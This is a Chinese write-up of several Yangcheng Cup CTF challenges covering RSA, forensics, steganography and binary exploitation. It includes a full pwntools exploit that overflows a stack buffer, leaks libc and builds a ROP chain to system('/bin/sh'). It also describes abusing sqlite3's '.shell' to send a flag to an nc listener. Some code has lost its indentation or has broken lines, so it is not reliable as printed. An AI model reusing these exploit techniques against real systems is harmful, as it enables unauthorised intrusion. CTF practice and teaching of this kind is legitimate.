本文来自“白帽子社区知识星球”
easyrsa
题目
from flag import flag
from Crypto.Util.number import *
m = bytes_to_long(flag)
e = 65537
f = open("output.txt", "r")
a = f.readlines()
for i in a:
n = int(i)
c = pow(m, e, n)
m = c
print 'c = %s' % (m)
f.close()
'''
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
'''
分析
1、output文件中的数做为n参与计算,计算结果作为下次计算的c。
2、观察output文件中的数,通过计算,得到了公约数p。这样就可以分解出q。从而计算出c。
解题
import gmpy2
from Crypto.Util.number import *
a = 65439077968397540989065489337415940784529269429684649365065378651353483030304843439003949649543376311871845618819107350646437252980144978447924976470943930075812834237368425374578215977641265884859875440799334807607478705932175148673160353577875890074101393042506714001617338265284910381849259298772642190619
b = 86843235426823545017422014398916780909062053456790256392304973548517489132984667679637386416948409930796162377844525829968317585749956057149930523547463230147376192820753802868362225137830225967953826475779047454555958271846035526319036389127587352017149417549187850782892924691511398536178090031958365483499
c = 57839320383142814687522363258949714784622321678585619281948174372461045134361003939684803510572969567182690634502610963365500727981041136988638273942465134797850643121827808482673619534240872593224537996099454035648829692386918230535360101064254854063175494150147494342652670585674593236663514793256521719547
d = 52668168898129361356420333177679019946307853075463961068071790653159090226904625885080236174231665178538405547828768043706515464922611051221394704678558922339886480247663138702481349098077291584992082414494275463670330534613607852999291645500391111597009868188974671249118213040057429113174377610094956993269
e = 79875848044631194160351918105738804229446748736206976033243436373010695259945613104837645712048695514204494137005015770637421510392760763371639480133851920449252506525423837434811693638210458851990502785655738042348115385964604080872180121543147063180945532713593712726527002909054818485584237993215139630243
f = 73100501797447180147684637554796375398455002202770022931512541062214916136294604754404667725341796896161398464327153718845280194035978972665664657052946003418121755545770123205426883869361411412259838522099085901563107814985172942977520233320215882707710717870398128412272218474014381169303848087621856187879
g = 89149546555397759430343098936690138982544367561661914051499112345535238108800665531588376806546499374457634397161670140520060064963391826220177798442707381640723248034061313974522233415815795656570220902974484865176728535660627712374835329967608728216749734529761431592345816592875807318876347151421393671763
h = 66449107450661172442868032153863675098235855689218695279414435182923510356012957155941548483160873271040452368644926703812707864779900715051152673705082002761445847561495295455460041902473282731259268870375921215589157288622757488879539441498396276257589120302991242300378364101246448094955634459779361686643
i = 79694880331320743031437708811856697413105291652061062223857313580221562305807771003185061831752133665835648647560103986928466217390444724672894866216636981793418219455653595717274553950715056120806463449033181486699963584346517910081706586345546292894426402568226579894766693070066214488743160957135286739213
j = 70521001788476157145543175674209083194325853388116385624440232036679708917857095748070597575068955423165296665429648694541353249787337464272095260410717659726012806836884799476995758902361678737968193674368688353935424186389207123637734230550266810766585903134004322848985320790788169777840924595645463787189
k = 51801430118171456966246071852561156183140136541960623661080056673664466785669585092926482194691254461430866302262960624015915371927788809661387318097968209364907625599562339722700041444342116899266802018340155635959614677597708758012024981583143521259152639480003228924151971208695043251548758407218187895663
l = 87310111118839703578797261862424304499548882114635944516216618095145194843718635007052242072452831460162126955481326379219639313067967998826898344673513019946299427614605216960081461930080199023399060417820769438661351988322185620598552697590115678078498754112860310272842870106790357443602405008865116282919
print(gmpy2.gcd(a,b,c,d,e,f,g,h,i,j,k,l))
e = 65537
def slov(n,c):
p = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
q = n//p
phi = gmpy2.mul((p-1),(q-1))
d = gmpy2.invert(e,phi)
m = gmpy2.powmod(c,d,n)
return m
tmp = []
with open ('output.txt','r') as f1:
for i in f1:
tmp.append(i)
tmp = tmp[::-1]
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
for i in tmp:
c = slov(int(i),c)
print(long_to_bytes(c))
结果
7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
b'GWHT{gixkJl7SJTcpLOL9zqwo}'
迷失幻境
通过DiskGenius加载附件,可以看到在迷失幻境目录下有好多图片,全部提取出来。
发现数字命名的图片全都一样
在附件vmdk镜像里的回收站中发现了一些文件
将其提出来。
其中$RE4UUGI.jpg发现与迷失幻境目录里的哒哒哒.jpg显示的内容一样。用Stegsolve查看,发现$RE4UUGI.jpg存在隐写。
用010editor查看$RJ3JGVF,发现为png文件的主体部分,缺少了文件头。
补齐文件头,得到一张和幻境一样的图片。
使用Stegsolve查看,发现key。
再使用outguess分解$RE4UUGI.jpg。就可以得到flag文件了
where_is_secret
打开附件,发现一个压缩包和一个文本。
打开文本:
Naseu bybkjkl, O wt mna Wkkopwkja hl Qrkgeux Fasxtorr. Zdl Kaozbgj hksu oty fblz hhntyoxj wu tzphvq ku Nqnhbta, hgj pox Qupo geyiuna ago ixkj jhtpyhrhlw hu aak Nblyehg gntr. Nahkj pvwgu pl QBJ Vxwgr Zdbkyzhr, O jlxj ovfkkux zk ikojn fk 29.94 bpgmay-layrbtc vkocpggh jaoyrxt wz kgpphto uhc. Soxt E yxvas mna Ynyoptt wyfe, E dbrh pgbeax ekb mu yvfk pv Nqnhbta ah ha aak rpvk lyxyekxtp.aak lhlysvkj ez ZCDA@K1tz0frjo
推算为维基尼亚加密,使用在线工具爆破:
得到password:GWHT@R1nd0yyds
解压出来后是一张图片
根据官方提示,
from PIL import Image
import math
def encode(text):
str_len = len(text)
width = math.ceil(str_len ** 0.5)
im = Image.new("RGB", (width, width), 0x0)
y = 0, 0
for i in text:
index = ord(i)
rgb = (0, (index & 0xFF00) >> 8, index & 0xFF)
y), rgb)
if x == width - 1:
x = 0
y += 1
else:
x += 1
return im
if __name__ == '__main__':
with open("829962.txt", encoding="gbk") as f:
all_text = f.read()
im = encode(all_text)
im.save("out.bmp")
逆向脚本,注意各颜色通道数值的位置,得到一篇文章。
import string
from PIL import Image
import math
from Crypto.Util.number import *
im = Image.open('out.bmp')
width = im.size[0]
r = ''
for y in range(width):
for x in range(width):
t = im.getpixel((x,y))
m = (t[1] << 8) + t[2]
r += (chr(m))
print(r)
for i in range(len(r)):
if r[i] in string.ascii_letters + '0123456789{-_}':
print(r[i], end='')
else:
print(' ', end='')
发现里面存在了一些英文字母
自己拼接下,得到了flag
flag{h1d3_1n_th3_p1ctur3}
YCBSQL-v4
拿到题目后,把sqlite3文件丢到IDA里面
1.判断环境变量
2.然后做了一些初始化的检查
然后就是一些循环看我们输入的参数,然后执行一些操作
本地运行的时候输入 .help 可以查看到命令帮助
可以看到下面有个 .shell 似乎可以执行命令
所以想到在 .sql 文件中输入
然后服务器用 nc 监听
可以看到flag被成功发送过来了
FakeNoOutput-v2
拿到题目后把fakeNoOutput丢到IDA
程序实现了一个简单的http解析
程序首先初始化,然后给s都写上0
使用fgets输入到s中,输入失败调用 response函数,并传入400
Responce函数就是http的相应体
Init函数设置缓冲区,然后给s2写上0x110个0,然后,在里面写上随机值
后面就是对相关http协议的字段对相应变量设置
这里如果sub_80497C4函数返回真就会进入 sub_8049E63 函数
我们看该函数的upload函数
这里strcpy向栈上拷贝数据,而且haystack是我们可控的,会存在栈溢出,注意strcpy的00截断
前面有个 while 循环,只要我们跳出那个循环走到下面,就可以到strcpy函数,所以我们在content 里面加一个 filename=
前面的content-length可以给size赋值
Responce 200 的地方可以传个地址进去泄露libc
from pwn import *
from time import sleep
context.terminal = ['tmux','splitw','-h']
context.log_level = 'debug'
# libc = ELF("./libc.so.6")
sh = process('./fakeNoOutput')
# sh = remote('tcp.dasc.buuoj.cn', 27898)
elf = ELF('./fakeNoOutput')
libc = elf.libc
ru = lambda x,drop = False : sh.recvuntil(x, drop)
sn = lambda x : sh.send(x)
rl = lambda : sh.recvline()
sl = lambda x : sh.sendline(x)
rv = lambda x : sh.recv(x)
sa = lambda a,b : sh.sendafter(a,b)
sla = lambda a,b : sh.sendlineafter(a,b)
strspn_got = elf.got["__libc_start_main"]
res200 = 0x080496A1
main_addr = 0x80492e0
bss = 0x0805D3C0
payload0 = b"""get /upload head
HTTP_SERVER1_token:taaaa
User-Agent:tcccc
Cookie:tdddd
Referer:teeee
Content-Length:t5600
rnContent:filename="""
payload0 += b'a' * 600
gdb.attach(sh, 'b *0x8049FEC')
pause()
sl(payload0)
payload = b"A" * 4164 + p32(res200)
payload += p32(main_addr)
payload += p32(strspn_got)
payload = payload.ljust((5000-18), b"B")
sn(payload)
res = ru("xf7")
libc_start_main = u32(res[-4:])
log.info("----------------------" + hex(libc_start_main))
libcbase = libc_start_main - libc.sym["__libc_start_main"]
system_libc = libcbase + libc.sym["system"]
gets_libc = libcbase + libc.sym["gets"]
log.info("----------------------" + hex(libcbase))
log.info("----------------------" + hex(gets_libc))
sl(payload0)
payload = b"A" * 4164 + p32(gets_libc)
payload += p32(0x08049539)
payload += p32(bss)
payload += p32(system_libc)
payload += p32(0xbeefbeef)
payload += p32(bss)
payload = payload.ljust((5000-18), b"B")
sn(payload)
sleep(5)
sl("/bin/shx00")
sh.interactive()
如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。
▼扫码关注白帽子社区公众号&加入知识星球▼
原文始发于微信公众号(白帽子社区):羊城杯CTF 题目wp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论